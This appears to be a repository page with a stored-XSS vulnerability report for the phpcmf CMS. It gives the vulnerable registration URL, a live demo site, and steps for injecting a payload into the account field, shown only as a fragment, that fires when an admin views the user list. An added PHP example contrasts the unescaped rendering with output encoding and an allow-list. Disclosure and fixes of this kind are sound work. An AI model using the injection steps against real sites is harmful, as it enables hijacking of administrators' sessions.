# phpcmf

**Repository Path**: copy_cat/phpcmf

## Basic Information

- **Project Name**: phpcmf
- **Description**: xss phpcmf
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 0
- **Forks**: 0
- **Created**: 2018-12-08
- **Last Updated**: 2020-12-19

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

# phpcmf

## stored xss phpcmf

![Enter image description](https://images.gitee.com/uploads/images/2018/1208/151549_21edaf12_1728172.png "Screenshot.png")

#### http://xxx.com/index.php?s=member&c=register&m=index

#### case: http://demo.tushucms.com/index.php?s=member&c=register&m=index

step1: On the user registration page, enter the payload `"> ` in the account field.

![Enter image description](https://images.gitee.com/uploads/images/2018/1208/151354_dc5b0685_1728172.png "YKNF]`19N__O]5}H17UDMXJ.png")

step2: When the admin logs in to the backend and opens user management, the XSS triggers immediately.

![Enter image description](https://images.gitee.com/uploads/images/2018/1208/151422_7f3c0e14_1728172.png "Screenshot.png")

#### http://www.phpcmf.net/version-13.html

![Enter image description](https://images.gitee.com/uploads/images/2018/1208/182132_4cacbe6e_1728172.png "Screenshot.png")

![Enter image description](https://images.gitee.com/uploads/images/2018/1208/182150_144e2c0c_1728172.png "Screenshot.png")
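
The two steps above describe an account name stored at registration and later rendered unescaped in the admin user list. The following is an added example, not phpcmf's own code, showing that sink beside an output-encoded version and a registration-time allow-list. The function names, the username policy, and the assumption that the value lands in an HTML attribute (suggested by the payload's leading `">`) are hypothetical.

```php
<?php
// Added example, not phpcmf code. All names and the policy are assumptions.

// Constructed sample row: an account name as stored after registration.
// The markup after `">` is a harmless stand-in, not the report's payload.
$stored = ['id' => 7, 'username' => '"><b data-test="x">injected</b>'];

// Before: the stored value is concatenated into an attribute unescaped,
// so a leading `">` closes the attribute and the tag around it.
function render_row_unsafe(array $u): string
{
    return '<tr><td><input type="text" name="username" value="'
        . $u['username'] . '"></td></tr>';
}

// After: encode at output time for the HTML context. ENT_QUOTES encodes both
// quote styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_row_safe(array $u): string
{
    return '<tr><td><input type="text" name="username" value="'
        . e($u['username']) . '"></td></tr>';
}

// Defence in depth at registration: allow-list the account name.
// Letters, digits, underscore, dot and hyphen only, 3 to 32 characters,
// so quotes and angle brackets never reach storage.
function is_valid_username(string $name): bool
{
    return preg_match('/\A[\p{L}\p{N}_.-]{3,32}\z/u', $name) === 1;
}

echo render_row_unsafe($stored), PHP_EOL;
echo render_row_safe($stored), PHP_EOL;
var_dump(is_valid_username($stored['username']));
var_dump(is_valid_username('alice_01'));
```

Output encoding in the admin template is the primary fix, because values already stored before the allow-list was introduced still pass through the same view.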